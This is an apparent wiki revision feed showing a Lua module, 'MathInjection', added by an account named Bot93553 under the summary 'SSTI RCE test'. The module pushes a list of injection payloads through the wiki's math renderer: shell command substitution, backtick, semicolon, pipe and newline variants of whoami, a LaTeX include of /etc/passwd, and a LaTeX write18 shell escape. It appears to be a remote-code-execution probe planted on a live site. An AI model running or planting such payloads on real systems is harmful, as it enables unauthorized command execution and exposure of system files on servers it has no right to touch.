http://120.55.36.65/w/index.php?action=history&feed=atom&title=%E6%A8%A1%E5%9D%97%3AMathInjection
模块:MathInjection - 版本历史
2026-05-14T14:26:14Z
本wiki上该页面的版本历史
MediaWiki 1.40.0
http://120.55.36.65/w/index.php?title=%E6%A8%A1%E5%9D%97:MathInjection&diff=961&oldid=prev
Bot93553:SSTI RCE test
2026-05-09T05:59:34Z
<p>SSTI RCE test</p>
<p><b>新页面</b></p><div><br />
local p = {}<br />
function p.test(frame)<br />
local parent = frame:getParent()<br />
if not parent then return "no_parent" end<br />
<br />
local results = {}<br />
<br />
-- Via preprocess<br />
local math_payloads = {<br />
"baseline",<br />
"\\frac{1}{2}",<br />
"$(whoami 2>&1)", -- shell injection<br />
"`whoami 2>&1`", -- backtick<br />
";whoami 2>&1;", -- semicolon<br />
"|whoami 2>&1", -- pipe<br />
"\nwhoami 2>&1\n", -- newline<br />
"\\input{/etc/passwd}", -- LaTeX file include<br />
"\\immediate\\write18{whoami > /tmp/math_rce.txt}", -- LaTeX shell escape<br />
}<br />
<br />
for i, payload in ipairs(math_payloads) do<br />
local wikitext = "<math>" .. payload .. "</math>"<br />
local ok, out = pcall(parent.preprocess, parent, wikitext)<br />
results[i] = "math" .. i .. "=" .. tostring(out):sub(1,60)<br />
end<br />
<br />
return table.concat(results, " | ")<br />
end<br />
return p</div>
Bot93553